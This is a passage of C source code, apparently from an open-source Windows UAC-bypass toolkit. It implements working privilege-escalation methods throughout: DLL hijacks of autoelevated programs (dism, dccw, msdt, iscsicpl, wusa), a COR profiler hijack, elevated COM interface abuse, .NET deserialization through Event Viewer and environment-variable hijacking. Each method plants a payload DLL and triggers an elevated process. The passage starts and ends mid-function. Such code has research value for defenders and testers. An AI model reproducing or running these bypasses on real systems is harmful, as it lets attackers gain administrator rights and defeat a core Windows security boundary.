FAKE_LOCAL_SXS);\n }\n else {\n _strcat(szDst, LOCAL_SXS);\n }\n\n //create local directory\n if (!ucmMasqueradedCreateSubDirectoryCOM(lpSxsPath, szDst))\n break;\n\n //create assembly directory\n _strcat(lpSxsPath, szDst);\n if (!ucmMasqueradedCreateSubDirectoryCOM(lpSxsPath, lpszDirectoryName))\n break;\n \n _strcat(lpSxsPath, TEXT(\"\\\\\"));\n _strcat(lpSxsPath, lpszDirectoryName);\n\n if (!ucmMasqueradedSetObjectSecurityCOM(lpSxsPath,\n DACL_SECURITY_INFORMATION,\n SE_FILE_OBJECT,\n T_SDDL_ALL_FOR_EVERYONE))\n {\n break;\n }\n\n //move payload file\n\n GetCurrentDirectory(MAX_PATH * 2, szCurDir);\n\n SetCurrentDirectory(lpSxsPath);\n\n if (!supWriteBufferToFile(COMCTL32_DLL, ProxyDll, ProxyDllSize))\n break;\n\n SetCurrentDirectory(szCurDir);\n\n //\n // Consent workaround end. \n // Restore real directory name.\n //\n if (bConsentItself) {\n _strcpy(lpSxsPath, g_ctx->szSystemDirectory);\n if (lpTargetDirectory) {\n _strcat(lpSxsPath, lpTargetDirectory);\n }\n _strcat(lpSxsPath, lpTargetApplication);\n _strcat(lpSxsPath, FAKE_LOCAL_SXS);\n\n _strcpy(szDst, lpTargetApplication);\n _strcat(szDst, LOCAL_SXS);\n\n if (!ucmMasqueradedRenameElementCOM(lpSxsPath, szDst))\n break;\n\n }\n\n //run target process\n _strcpy(szDst, g_ctx->szSystemDirectory);\n if (lpTargetDirectory) {\n _strcat(szDst, lpTargetDirectory);\n }\n\n if (lpLaunchApplication) {\n _strcat(szDst, lpLaunchApplication);\n }\n else {\n _strcat(szDst, lpTargetApplication);\n }\n\n if (supRunProcess2(szDst, \n NULL, \n NULL, \n SW_SHOWNORMAL, \n 1000))\n {\n MethodResult = STATUS_SUCCESS;\n }\n\n } while (FALSE);\n\n if (lpszFullDllPath) supVirtualFree(lpszFullDllPath, NULL);\n if (lpSxsPath) supVirtualFree(lpSxsPath, NULL);\n\n return MethodResult;\n}\n\n/*\n* ucmSXSMethodCleanup\n*\n* Purpose:\n*\n* Post execution cleanup routine for SXSMethod.\n*\n*/\nBOOL ucmSXSMethodCleanup(\n VOID\n)\n{\n WCHAR szBuffer[MAX_PATH * 2];\n\n _strcpy(szBuffer, g_ctx->szSystemDirectory);\n _strcat(szBuffer, CONSENT_EXE);\n _strcat(szBuffer, LOCAL_SXS);\n\n return ucmMasqueradedDeleteDirectoryFileCOM(szBuffer);\n}\n\n/*\n* ucmxDisemer\n*\n* Purpose:\n*\n* Build parameters to the pkgmgr and force it to start dism.exe.\n* \n* Note: \n* Name is a very original WD behavior signature name.\n*\n*/\nNTSTATUS ucmxDisemer()\n{\n WCHAR szApplication[MAX_PATH * 2];\n WCHAR szParameters[256];\n\n _strcpy(szApplication, g_ctx->szSystemDirectory);\n _strcat(szApplication, PKGMGR_EXE);\n\n _strcpy(szParameters, TEXT(\"/ip\"));\n _strcat(szParameters, TEXT(\" /m:\"));\n _strcat(szParameters, MYSTERIOUSCUTETHING);\n _strcat(szParameters, TEXT(\" /quiet\"));\n\n if (supRunProcess2(szApplication, \n szParameters, \n NULL, \n SW_HIDE, \n SUPRUNPROCESS_TIMEOUT_DEFAULT)) \n {\n return STATUS_SUCCESS;\n }\n\n return STATUS_ACCESS_DENIED;\n}\n\n#define DISM_DLL_NAMES 2\nLPCWSTR g_DismTargets[DISM_DLL_NAMES] = {\n DISMCORE_DLL,\n APISET_KERNEL32LEGACY\n};\n\n/*\n* ucmDismMethodCleanup\n*\n* Purpose:\n*\n* Cleanup routine for Dism method.\n*\n*/\nVOID ucmDismMethodCleanup(VOID)\n{\n DWORD i, cNames;\n cNames = (g_ctx->dwBuildNumber < NT_WIN10_20H1) ? 1 : DISM_DLL_NAMES;\n\n for (i = 0; i < cNames; i++) {\n ucmMethodCleanupSingleItemSystem32(g_DismTargets[i], NULL);\n }\n}\n\n/*\n* ucmDismMethod\n*\n* Purpose:\n*\n* Exploit DISM application dll loading scheme.\n*\n* Dism.exe located in system32 folder while it dlls are in system32\\dism\n* When loaded dism first attempt to load dlls from system32 folder.\n*\n* Trigger: pkgmgr.exe\n* PkgMgr.exe is autoelevated whitelisted application which is actually just calling Dism.exe\n*\n*/\nNTSTATUS ucmDismMethod(\n _In_ PVOID ProxyDll,\n _In_ DWORD ProxyDllSize\n)\n{\n NTSTATUS MethodResult = STATUS_ACCESS_DENIED;\n DWORD i, cNames;\n SIZE_T nLen;\n\n WCHAR szSource[MAX_PATH * 2];\n\n cNames = (g_ctx->dwBuildNumber < NT_WIN10_20H1) ? 1 : DISM_DLL_NAMES;\n \n for (i = 0; i < cNames; i++) {\n\n MethodResult = ucmGenericAutoelevation(NULL,\n g_DismTargets[i],\n ProxyDll,\n ProxyDllSize);\n\n if (NT_SUCCESS(MethodResult)) {\n MethodResult = ucmxDisemer();\n }\n\n //\n // Cleanup temp.\n //\n if (!NT_SUCCESS(MethodResult)) {\n _strcpy(szSource, g_ctx->szTempDirectory);\n _strcat(szSource, g_DismTargets[i]);\n nLen = _strlen(szSource);\n szSource[nLen - 1] = UCM_TRASH_END_CHAR;\n DeleteFile(szSource);\n }\n\n Sleep(1000);\n }\n\n return MethodResult;\n}\n\n/*\n* ucmWow64LoggerMethod\n*\n* Purpose:\n*\n* Bypass UAC using wow64 logger dll and wow64 application.\n*\n* Trigger: 32bit version of wusa.exe\n* Loader will map and call our logger dll during wow64 process initialization.\n*\n*/\nNTSTATUS ucmWow64LoggerMethod(\n _In_ PVOID ProxyDll,\n _In_ DWORD ProxyDllSize\n)\n{\n WCHAR szTarget[MAX_PATH * 2];\n\n //\n // Build target application full path.\n // We need autoelevated application from syswow64 folder ONLY.\n //\n _strcpy(szTarget, USER_SHARED_DATA->NtSystemRoot);\n _strcat(szTarget, SYSWOW64_DIR);\n _strcat(szTarget, WUSA_EXE);\n\n //\n // Attempt to remove payload dll after execution in method.c!PostCleanupAttempt.\n // Warning: every wow64 application will load payload code (some will crash).\n // Remove file IMMEDIATELY after work.\n //\n\n return ucmGenericAutoelevation(szTarget,\n WOW64LOG_DLL,\n ProxyDll,\n ProxyDllSize);\n}\n\n/*\n* ucmUiAccessMethod\n*\n* Purpose:\n*\n* Bypass UAC using uiAccess(true) application.\n* Original method source\n* https://habrahabr.ru/company/pm/blog/328008/\n*\n*/\nNTSTATUS ucmUiAccessMethod(\n _In_ PVOID ProxyDll,\n _In_ DWORD ProxyDllSize\n)\n{\n NTSTATUS MethodResult = STATUS_ACCESS_DENIED;\n SIZE_T Length;\n LPWSTR lpEnv = NULL, lpTargetDll;\n UNICODE_STRING uStr = RTL_CONSTANT_STRING(L\"ProgramFiles=\");\n WCHAR szTarget[MAX_PATH * 2];\n WCHAR szSource[MAX_PATH * 2];\n\n do {\n\n //\n // There is no osksupport.dll in Windows 7.\n //\n if (g_ctx->dwBuildNumber < NT_WIN8_RTM)\n lpTargetDll = DUSER_DLL;\n else\n lpTargetDll = OSKSUPPORT_DLL;\n\n //\n // Replace default Fubuki dll entry point with new.\n //\n if (!supReplaceDllEntryPoint(ProxyDll,\n ProxyDllSize,\n FUBUKI_EXT_ENTRYPOINT,\n FALSE))\n {\n break;\n }\n\n //\n // Drop modified Fubuki to the %temp%\n //\n RtlSecureZeroMemory(szSource, sizeof(szSource));\n _strcpy(szSource, g_ctx->szTempDirectory);\n _strcat(szSource, lpTargetDll);\n if (!supWriteBufferToFile(szSource, ProxyDll, ProxyDllSize))\n break;\n\n //\n // Build target path in g_lpIncludePFDirs\n //\n lpEnv = supQueryEnvironmentVariableOffset(&uStr);\n if (lpEnv == NULL)\n break;\n\n Length = _strlen(lpEnv);\n if ((Length == 0) || (Length > MAX_PATH))\n break;\n\n RtlSecureZeroMemory(&szTarget, sizeof(szTarget));\n _strncpy(szTarget, MAX_PATH, lpEnv, MAX_PATH);\n _strcat(szTarget, TEXT(\"\\\\\"));\n _strcat(szTarget, T_WINDOWSMEDIAPLAYER);\n _strcat(szTarget, TEXT(\"\\\\\"));\n\n //\n // In case if Media Player is not installed / available.\n //\n if (!PathFileExists(szTarget)) {\n if (!ucmMasqueradedCreateSubDirectoryCOM(lpEnv, T_WINDOWSMEDIAPLAYER))\n break;\n }\n\n //\n // Copy Fubuki to target directory.\n // \n if (!ucmMasqueradedMoveFileCOM(szSource, szTarget))\n break;\n\n //\n // Copy osk.exe to Program Files\\Windows Media Player\n //\n RtlSecureZeroMemory(szSource, sizeof(szSource));\n _strcpy(szSource, g_ctx->szSystemDirectory);\n _strcat(szSource, OSK_EXE);\n if (!ucmMasqueradedMoveCopyFileCOM(szSource, szTarget, FALSE))\n break;\n\n //\n // Run uiAccess osk.exe from Program Files.\n //\n _strcat(szTarget, OSK_EXE);\n if (supRunProcess2(szTarget, NULL, NULL, SW_SHOW, 0)) {\n //\n // Run eventvwr.exe as final trigger.\n // Spawns mmc.exe with eventvwr.msc snap-in.\n //\n _strcpy(szTarget, g_ctx->szSystemDirectory);\n _strcat(szTarget, EVENTVWR_EXE);\n if (supRunProcess2(szTarget, NULL, NULL, SW_SHOW, 0))\n MethodResult = STATUS_SUCCESS;\n }\n\n } while (FALSE);\n\n return MethodResult;\n}\n\n/*\n* ucmSXSDccwMethod\n*\n* Purpose:\n*\n* Similar to ucmSXSMethod, except using different target app and dll.\n* Dccw idea by Ernesto Fernandez (https://github.com/L3cr0f/DccwBypassUAC)\n*\n*/\nNTSTATUS ucmSXSDccwMethod(\n _In_ PVOID ProxyDll,\n _In_ DWORD ProxyDllSize\n)\n{\n NTSTATUS MethodResult = STATUS_ACCESS_DENIED;\n BOOL bWusaNeedCleanup = FALSE;\n HMODULE hGdiPlus = NULL;\n WCHAR* lpszFullDllPath = NULL, * lpszDirectoryName = NULL;\n SIZE_T sz;\n LPWSTR lpSxsPath = NULL, lpEnd;\n\n WCHAR szBuffer[MAX_PATH * 2], szTarget[MAX_PATH * 2];\n\n SXS_SEARCH_CONTEXT sctx;\n\n do {\n //\n // Check if target app available. Maybe unavailable in server edition.\n //\n _strcpy(szTarget, g_ctx->szSystemDirectory);\n _strcat(szTarget, DCCW_EXE);\n if (!PathFileExists(szTarget)) {\n MethodResult = STATUS_OBJECT_NAME_NOT_FOUND;\n break;\n }\n\n //\n // Load GdiPlus in our address space to get it full path.\n //\n RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));\n _strcpy(szBuffer, g_ctx->szSystemDirectory);\n _strcat(szBuffer, GDIPLUS_DLL);\n hGdiPlus = LoadLibrary(szBuffer);\n if (hGdiPlus == NULL) {\n MethodResult = STATUS_DLL_NOT_FOUND;\n break;\n }\n\n sz = UNICODE_STRING_MAX_BYTES;\n\n lpszFullDllPath = (WCHAR*)supVirtualAlloc(\n &sz,\n DEFAULT_ALLOCATION_TYPE,\n DEFAULT_PROTECT_TYPE,\n NULL);\n\n if (lpszFullDllPath == NULL)\n break;\n\n sctx.DllName = GDIPLUS_DLL;\n sctx.SxsKey = GDIPLUS_SXS;\n sctx.FullDllPath = lpszFullDllPath;\n\n if (!sxsFindLoaderEntry(&sctx)) {\n MethodResult = STATUS_SXS_KEY_NOT_FOUND;\n break;\n }\n\n lpszDirectoryName = _filename(lpszFullDllPath);\n if (lpszDirectoryName == NULL)\n break;\n\n sz = _strlen(lpszDirectoryName) * sizeof(WCHAR);\n sz += PAGE_SIZE;\n\n lpSxsPath = (LPWSTR)supVirtualAlloc(\n &sz,\n DEFAULT_ALLOCATION_TYPE,\n DEFAULT_PROTECT_TYPE,\n NULL);\n\n if (lpSxsPath == NULL)\n break;\n\n //\n // Create DotLocal path.\n //\n _strcpy(lpSxsPath, DCCW_EXE);\n _strcat(lpSxsPath, LOCAL_SXS);\n _strcat(lpSxsPath, TEXT(\"\\\\\"));\n _strcat(lpSxsPath, lpszDirectoryName);\n _strcat(lpSxsPath, TEXT(\"\\\\\"));\n _strcat(lpSxsPath, GDIPLUS_DLL);\n\n //\n // Create fake cab file.\n //\n RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));\n _strcpy(szBuffer, g_ctx->szTempDirectory);\n _strcat(szBuffer, GDIPLUS_DLL);\n\n bWusaNeedCleanup = ucmCreateCabinetForSingleFile(\n szBuffer,\n ProxyDll,\n ProxyDllSize,\n lpSxsPath);\n\n if (!bWusaNeedCleanup)\n break;\n\n _strcpy(szBuffer, g_ctx->szSystemDirectory);\n lpEnd = _strend(szBuffer);\n if (*(lpEnd - 1) == TEXT('\\\\'))\n *(lpEnd - 1) = TEXT('\\0');\n\n if (!ucmWusaExtractViaJunction(szBuffer))\n break;\n\n Sleep(2000);\n\n //\n // Run target.\n //\n if (supRunProcess(szTarget, NULL))\n MethodResult = STATUS_SUCCESS;\n\n } while (FALSE);\n\n //\n // Cleanup resources.\n //\n if (hGdiPlus != NULL) FreeLibrary(hGdiPlus);\n if (lpszFullDllPath) supVirtualFree(lpszFullDllPath, NULL);\n if (lpSxsPath) supVirtualFree(lpSxsPath, NULL);\n if (bWusaNeedCleanup) ucmWusaCabinetCleanup();\n\n return MethodResult;\n}\n\n/*\n* ucmSXSDccwMethodCleanup\n*\n* Purpose:\n*\n* Post execution cleanup routine for SXSDccwMethod.\n*\n*/\nBOOL ucmSXSDccwMethodCleanup(\n VOID\n)\n{\n WCHAR szBuffer[MAX_PATH * 2];\n\n _strcpy(szBuffer, g_ctx->szSystemDirectory);\n _strcat(szBuffer, DCCW_EXE);\n _strcat(szBuffer, LOCAL_SXS);\n\n return ucmMasqueradedDeleteDirectoryFileCOM(szBuffer);\n}\n\n/*\n* ucmCorProfilerMethod\n*\n* Purpose:\n*\n* Bypass UAC using COR profiler.\n* http://seclists.org/fulldisclosure/2017/Jul/11\n*\n*/\nNTSTATUS ucmCorProfilerMethod(\n _In_ PVOID ProxyDll,\n _In_ DWORD ProxyDllSize\n)\n{\n NTSTATUS MethodResult = STATUS_ACCESS_DENIED;\n\n SIZE_T sz = 0;\n GUID guid;\n HKEY hKey = NULL;\n LRESULT lResult;\n LPOLESTR OutputGuidString = NULL;\n\n WCHAR szBuffer[MAX_PATH * 2], szRegBuffer[MAX_PATH * 4];\n\n do {\n //\n // Create unique GUID\n //\n if (CoCreateGuid(&guid) != S_OK)\n break;\n\n if (StringFromCLSID(&guid, &OutputGuidString) != S_OK)\n break;\n\n _strcpy(szBuffer, g_ctx->szTempDirectory);\n _strcat(szBuffer, MYSTERIOUSCUTETHING);\n _strcat(szBuffer, TEXT(\".dll\"));\n if (!supWriteBufferToFile(szBuffer, ProxyDll, ProxyDllSize))\n break;\n\n supSetEnvVariable(FALSE, NULL, COR_ENABLE_PROFILING, TEXT(\"1\"));\n supSetEnvVariable(FALSE, NULL, COR_PROFILER, OutputGuidString);\n\n if (g_ctx->dwBuildNumber >= NT_WIN8_RTM) {\n supSetEnvVariable(FALSE, NULL, COR_PROFILER_PATH, szBuffer);\n }\n else {\n //\n // On Windows 7 target written on 3+ dotnet, registration required.\n //\n _strcpy(szRegBuffer, T_REG_SOFTWARECLASSESCLSID);\n _strcat(szRegBuffer, OutputGuidString);\n _strcat(szRegBuffer, T_REG_INPROCSERVER32);\n\n hKey = NULL;\n lResult = RegCreateKeyEx(HKEY_CURRENT_USER, szRegBuffer, 0, NULL,\n REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, NULL);\n if (lResult == ERROR_SUCCESS) {\n\n sz = (1 + _strlen(szBuffer)) * sizeof(WCHAR);\n lResult = RegSetValueEx(hKey,\n TEXT(\"\"),\n 0,\n REG_SZ,\n (BYTE*)szBuffer,\n (DWORD)sz);\n\n if (lResult == ERROR_SUCCESS) {\n\n _strcpy(szRegBuffer, T_APARTMENT);\n sz = (1 + _strlen(szRegBuffer)) * sizeof(WCHAR);\n RegSetValueEx(hKey,\n T_THREADINGMODEL,\n 0,\n REG_SZ,\n (BYTE*)szRegBuffer,\n (DWORD)sz);\n\n }\n\n RegCloseKey(hKey);\n }\n }\n\n //\n // Load target app and trigger cor profiler, eventvwr snap-in is written in the dotnet.\n //\n if (supRunProcess2(MMC_EXE,\n EVENTVWR_MSC,\n NULL,\n SW_SHOW,\n SUPRUNPROCESS_TIMEOUT_DEFAULT))\n {\n MethodResult = STATUS_SUCCESS;\n }\n\n } while (FALSE);\n\n //\n // Cleanup.\n //\n if (OutputGuidString != NULL) {\n supSetEnvVariable(TRUE, NULL, COR_PROFILER, NULL);\n CoTaskMemFree(OutputGuidString);\n }\n\n supSetEnvVariable(TRUE, NULL, COR_ENABLE_PROFILING, NULL);\n\n if (g_ctx->dwBuildNumber >= NT_WIN8_RTM)\n supSetEnvVariable(TRUE, NULL, COR_PROFILER_PATH, NULL);\n\n return MethodResult;\n}\n\n/*\n* ucmDccwCOMMethod\n*\n* Purpose:\n*\n* Bypass UAC using ColorDataProxy/CCMLuaUtil undocumented COM interfaces.\n* This function expects that supMasqueradeProcess was called on process initialization.\n*\n*/\nNTSTATUS ucmDccwCOMMethod(\n _In_ LPWSTR lpszPayload\n)\n{\n NTSTATUS MethodResult = STATUS_ACCESS_DENIED;\n HRESULT r = E_FAIL, hr_init;\n\n SIZE_T sz = 0;\n\n ICMLuaUtil* CMLuaUtil = NULL;\n IColorDataProxy* ColorDataProxy = NULL;\n\n hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);\n\n do {\n\n sz = _strlen(lpszPayload);\n if (sz == 0) {\n MethodResult = STATUS_INVALID_PARAMETER;\n break;\n }\n\n //\n // Create elevated COM object for CMLuaUtil.\n //\n r = ucmAllocateElevatedObject(\n T_CLSID_CMSTPLUA,\n &IID_ICMLuaUtil,\n CLSCTX_LOCAL_SERVER,\n &CMLuaUtil);\n\n if (r != S_OK) {\n break;\n }\n\n if (CMLuaUtil == NULL) {\n break;\n }\n\n //\n // Write new custom calibrator value to HKLM.\n //\n r = CMLuaUtil->lpVtbl->SetRegistryStringValue(CMLuaUtil,\n HKEY_LOCAL_MACHINE,\n T_DISPLAY_CALIBRATION,\n T_CALIBRATOR_VALUE,\n lpszPayload);\n\n if (FAILED(r)) {\n break;\n }\n\n //\n // Create elevated COM object for ColorDataProxy.\n //\n r = ucmAllocateElevatedObject(\n T_CLSID_ColorDataProxy,\n &IID_IColorDataProxy,\n CLSCTX_LOCAL_SERVER,\n &ColorDataProxy);\n\n\n if (r != S_OK) {\n break;\n }\n\n if (ColorDataProxy == NULL) {\n break;\n }\n\n //\n // Run our \"custom calibrator\".\n //\n r = ColorDataProxy->lpVtbl->LaunchDccw(ColorDataProxy, 0);\n\n if (SUCCEEDED(r))\n MethodResult = STATUS_SUCCESS;\n\n Sleep(1000);\n\n //\n // Remove calibrator value.\n //\n CMLuaUtil->lpVtbl->DeleteRegistryStringValue(CMLuaUtil,\n HKEY_LOCAL_MACHINE,\n T_DISPLAY_CALIBRATION,\n T_CALIBRATOR_VALUE);\n\n } while (FALSE);\n\n if (CMLuaUtil != NULL) {\n CMLuaUtil->lpVtbl->Release(CMLuaUtil);\n }\n\n if (ColorDataProxy != NULL) {\n ColorDataProxy->lpVtbl->Release(ColorDataProxy);\n }\n\n if (hr_init == S_OK)\n CoUninitialize();\n\n return MethodResult;\n}\n\n/*\n* ucmJunctionMethod\n*\n* Purpose:\n*\n* Bypass UAC using two different steps:\n*\n* 1) Create wusa.exe race condition and force wusa to copy files to the protected directory using NTFS reparse point.\n* 2) Disemer\n*\n* Wusa race condition in combination with junctions found by Thomas Vanhoutte.\n*\n*/\nNTSTATUS ucmJunctionMethod(\n _In_ PVOID ProxyDll,\n _In_ DWORD ProxyDllSize\n)\n{\n NTSTATUS MethodResult = STATUS_ACCESS_DENIED;\n\n DWORD i, cNames;\n\n LPWSTR lpEnd;\n\n WCHAR szBuffer[MAX_PATH * 2];\n\n //\n // Drop payload dll to %temp% and make cab for it.\n //\n cNames = (g_ctx->dwBuildNumber < NT_WIN10_20H1) ? 1 : DISM_DLL_NAMES;\n\n for (i = 0; i < cNames; i++) {\n\n RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));\n _strcpy(szBuffer, g_ctx->szTempDirectory);\n _strcat(szBuffer, g_DismTargets[i]);\n\n if (ucmCreateCabinetForSingleFile(szBuffer, ProxyDll, ProxyDllSize, NULL)) {\n\n _strcpy(szBuffer, g_ctx->szSystemDirectory);\n\n lpEnd = _strend(szBuffer);\n if (*(lpEnd - 1) == TEXT('\\\\'))\n *(lpEnd - 1) = TEXT('\\0');\n\n if (ucmWusaExtractViaJunction(szBuffer)) {\n\n //\n // Run target.\n //\n MethodResult = ucmxDisemer();\n\n }\n\n ucmWusaCabinetCleanup();\n }\n\n }\n\n#ifdef _DEBUG\n supSetGlobalCompletionEvent();\n#endif\n\n return MethodResult;\n}\n\n/*\n* ucmMsdtMethod\n*\n* Purpose:\n*\n* Bypass UAC by dll hijack of sdiagnhost.\n* https://blog.sevagas.com/?MSDT-DLL-Hijack-UAC-bypass\n*\n*/\nNTSTATUS ucmMsdtMethod(\n _In_ PVOID ProxyDll,\n _In_ DWORD ProxyDllSize\n)\n{\n BOOLEAN bCleanupNeeded = FALSE;\n UINT i;\n NTSTATUS MethodResult = STATUS_ACCESS_DENIED;\n#ifndef _WIN64\n NTSTATUS ntStatus = STATUS_ACCESS_DENIED;\n#endif\n WCHAR szPath[MAX_PATH * 2];\n WCHAR szApp[MAX_PATH + 1];\n WCHAR szParams[MAX_PATH * 2];\n\n#ifndef _WIN64\n if (g_ctx->IsWow64) {\n ntStatus = supEnableDisableWow64Redirection(TRUE);\n if (!NT_SUCCESS(ntStatus))\n return ntStatus;\n }\n#endif\n\n do {\n\n RtlSecureZeroMemory(&szPath, sizeof(szPath));\n if (!SHGetSpecialFolderPath(NULL, (LPWSTR)&szPath, CSIDL_LOCAL_APPDATA, FALSE))\n break;\n\n supConcatenatePaths(szPath, TEXT(\"Microsoft\\\\WindowsApps\"), MAX_PATH);\n supConcatenatePaths(szPath, BLUETOOTHDIAGNOSTICUTIL_DLL, MAX_PATH);\n\n if (!supWriteBufferToFile(szPath, ProxyDll, ProxyDllSize))\n break;\n\n bCleanupNeeded = TRUE;\n\n _strcpy(szApp, g_ctx->szSystemRoot);\n supConcatenatePaths(szApp, SYSWOW64_DIR, MAX_PATH);\n supConcatenatePaths(szApp, MSDT_EXE, MAX_PATH);\n\n _strcpy(szParams, TEXT(\"-path \"));\n _strcat(szParams, g_ctx->szSystemRoot);\n _strcat(szParams, TEXT(\"diagnostics\\\\index\\\\BluetoothDiagnostic.xml -skip yes\"));\n\n if (supRunProcess2(szApp,\n szParams,\n NULL,\n SW_HIDE,\n 10000))\n {\n MethodResult = STATUS_SUCCESS;\n }\n\n } while (FALSE);\n\n\n if (bCleanupNeeded) {\n i = 5;\n do {\n\n if (DeleteFile(szPath))\n break;\n\n Sleep(1000);\n i--;\n } while (i);\n\n }\n\n\n#ifndef _WIN64\n if (g_ctx->IsWow64) {\n supEnableDisableWow64Redirection(FALSE);\n }\n#endif\n\n#ifdef _DEBUG\n supSetGlobalCompletionEvent();\n#endif\n\n return MethodResult;\n}\n\n/*\n* ucmDotNetSerialMethod\n*\n* Purpose:\n*\n* Bypass UAC using DotNet Deserialization for eventvwr.\n*\n*/\nNTSTATUS ucmDotNetSerialMethod(\n _In_ LPWSTR lpszPayload\n)\n{\n NTSTATUS MethodResult = STATUS_ACCESS_DENIED;\n HANDLE hProcess = NULL;\n PVOID dataBuffer;\n DWORD dataSize;\n LPWSTR lpAppData = NULL, lpTargetPath = NULL;\n SIZE_T memIO;\n WCHAR szTarget[MAX_PATH * 2];\n\n do {\n\n //\n // Set payload as environment variable.\n //\n supSetEnvVariable(FALSE, NULL, MYSTERIOUSCUTETHING, lpszPayload);\n\n //\n // Drop RecentViews cache element to %AppData%.\n //\n if (FAILED(SHGetKnownFolderPath(&FOLDERID_LocalAppData, 0, NULL, &lpAppData)))\n break;\n\n memIO = (MAX_PATH + _strlen(lpAppData)) * sizeof(WCHAR);\n lpTargetPath = (LPWSTR)supHeapAlloc(memIO);\n if (lpTargetPath == NULL)\n break;\n\n _strcpy(lpTargetPath, lpAppData);\n _strcat(lpTargetPath, TEXT(\"\\\\Microsoft\\\\Event Viewer\\\\RecentViews\"));\n\n if (g_ctx->dwBuildNumber < NT_WIN8_RTM) {\n dataBuffer = (PVOID)g_encodedRecentViewsV2;\n dataSize = sizeof(g_encodedRecentViewsV2);\n }\n else {\n dataBuffer = (PVOID)g_encodedRecentViews;\n dataSize = sizeof(g_encodedRecentViews);\n }\n\n if (!supDecodeAndWriteBufferToFile(lpTargetPath,\n (CONST PVOID)dataBuffer,\n dataSize,\n 'zzzz'))\n {\n break;\n }\n\n //\n // Run eventvwr.exe as final trigger.\n //\n _strcpy(szTarget, g_ctx->szSystemDirectory);\n _strcat(szTarget, MMC_EXE);\n hProcess = supRunProcess3(szTarget, EVENTVWR_MSC, NULL, SW_SHOW);\n if (hProcess) {\n supWaitForChildProcesses(MMC_EXE, 50 * 1000);\n CloseHandle(hProcess);\n MethodResult = STATUS_SUCCESS;\n }\n\n } while (FALSE);\n\n CoTaskMemFree(lpAppData);\n if (lpTargetPath) {\n DeleteFile(lpTargetPath);\n supHeapFree(lpTargetPath);\n }\n\n supSetEnvVariable(TRUE, NULL, MYSTERIOUSCUTETHING, NULL);\n\n return MethodResult;\n}\n\n/*\n* ucmIscsiCplMethodCleanup\n*\n* Purpose:\n*\n* Post execution cleanup routine.\n*\n*/\nVOID ucmIscsiCplMethodCleanup(\n VOID\n)\n{\n WCHAR szBuffer[MAX_PATH * 2];\n\n _strcpy(szBuffer, g_ctx->szTempDirectory);\n _strcat(szBuffer, ISCSIEXE_DLL);\n DeleteFile(szBuffer);\n}\n\n/*\n* ucmIscsiCplMethod\n*\n* Purpose:\n*\n* Bypass UAC by dll hijack of iscsicpl.\n* https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC\n*\n*/\nNTSTATUS ucmIscsiCplMethod(\n _In_ PVOID ProxyDll,\n _In_ DWORD ProxyDllSize\n)\n{\n BOOL bValueSet = FALSE;\n NTSTATUS MethodResult = STATUS_ACCESS_DENIED;\n SIZE_T nLen;\n WCHAR* pszOldEnvValue = NULL;\n WCHAR szBuffer[MAX_PATH * 2];\n\n\n#ifndef _WIN64\n if (g_ctx->IsWow64) {\n MethodResult = supEnableDisableWow64Redirection(TRUE);\n if (!NT_SUCCESS(MethodResult))\n return MethodResult;\n }\n#endif\n\n do {\n\n _strcpy(szBuffer, g_ctx->szTempDirectory);\n nLen = _strlen(szBuffer);\n if (szBuffer[nLen - 1] == L'\\\\') {\n szBuffer[nLen - 1] = 0;\n }\n\n bValueSet = supReplaceEnvironmentVariableValue(NULL,\n TEXT(\"Path\"),\n REG_EXPAND_SZ,\n szBuffer,\n (PVOID*)&pszOldEnvValue);\n\n if (!bValueSet)\n break;\n\n _strcpy(szBuffer, g_ctx->szTempDirectory);\n _strcat(szBuffer, ISCSIEXE_DLL);\n if (!supWriteBufferToFile(szBuffer, ProxyDll, ProxyDllSize))\n break;\n\n _strcpy(szBuffer, USER_SHARED_DATA->NtSystemRoot);\n _strcat(szBuffer, SYSWOW64_DIR);\n _strcat(szBuffer, ISCSICPL_EXE);\n if (supRunProcess2(szBuffer, NULL, NULL, SW_HIDE, 5000))\n MethodResult = STATUS_SUCCESS;\n\n } while (FALSE);\n\n if (pszOldEnvValue) {\n\n supReplaceEnvironmentVariableValue(NULL,\n TEXT(\"Path\"),\n REG_EXPAND_SZ,\n pszOldEnvValue,\n NULL);\n\n supHeapFree(pszOldEnvValue);\n }\n else {\n supRegCurrentUserDeleteSubKeyValue(TEXT(\"Environment\"), TEXT(\"Path\"));\n }\n\n#ifndef _WIN64\n if (g_ctx->IsWow64) {\n supEnableDisableWow64Redirection(FALSE);\n }\n#endif\n\n#ifdef _DEBUG\n supSetGlobalCompletionEvent();\n#endif\n\n return MethodResult;\n}\n\n/*\n* ucmRequestTraceMethod\n*\n* Purpose:\n*\n* Bypass UAC by environment variables hijack and dll planting.\n* https://github.com/R41N3RZUF477/RequestTrace_UAC_Bypass\n*\n*/\nNTSTATUS ucmRequestTraceMethod(\n _In_ PVOID ProxyDll,\n _In_ DWORD ProxyDllSize\n)\n{\n BOOL fDirCreated = FALSE, fEnvSet = FALSE;\n NTSTATUS MethodResult = STATUS_ACCESS_DENIED;\n SIZE_T PayloadDirNameLen = 0, nLen;\n WCHAR szBuffer[MAX_PATH + 1];\n WCHAR szPayloadDir[MAX_PATH * 2];\n\n UNICODE_STRING uStrTaskhost = RTL_CONSTANT_STRING(TASKHOSTW_EXE);\n\n INPUT inputs[8];\n\n do {\n //\n // Create destination dir \"system32\" in %temp%.\n //\n _strcpy(szPayloadDir, g_ctx->szTempDirectory);\n _strcat(szPayloadDir, SYSTEM32_DIR_NAME);\n PayloadDirNameLen = _strlen(szPayloadDir);\n if (!CreateDirectory(szPayloadDir, NULL)) {\n if (GetLastError() != ERROR_ALREADY_EXISTS)\n break;\n }\n\n fDirCreated = TRUE;\n\n _strcat(szPayloadDir, TEXT(\"\\\\\"));\n _strcat(szPayloadDir, PERFORMANCETRACEHANDLER_DLL);\n if (!supWriteBufferToFile(szPayloadDir, ProxyDll, ProxyDllSize))\n break;\n\n //\n // Set new %SystemRoot% environment variable.\n //\n _strcpy(szBuffer, g_ctx->szTempDirectory);\n\n nLen = _strlen(szBuffer);\n if (szBuffer[nLen - 1] == L'\\\\') {\n szBuffer[nLen - 1] = 0;\n }\n\n fEnvSet = supSetEnvVariable(FALSE, T_VOLATILE_ENV, T_SYSTEMROOT, szBuffer);\n if (fEnvSet == FALSE)\n break;\n\n 